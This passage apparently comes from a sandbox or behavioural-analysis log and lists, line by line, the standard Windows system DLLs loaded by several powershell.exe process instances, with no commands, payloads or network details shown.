        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
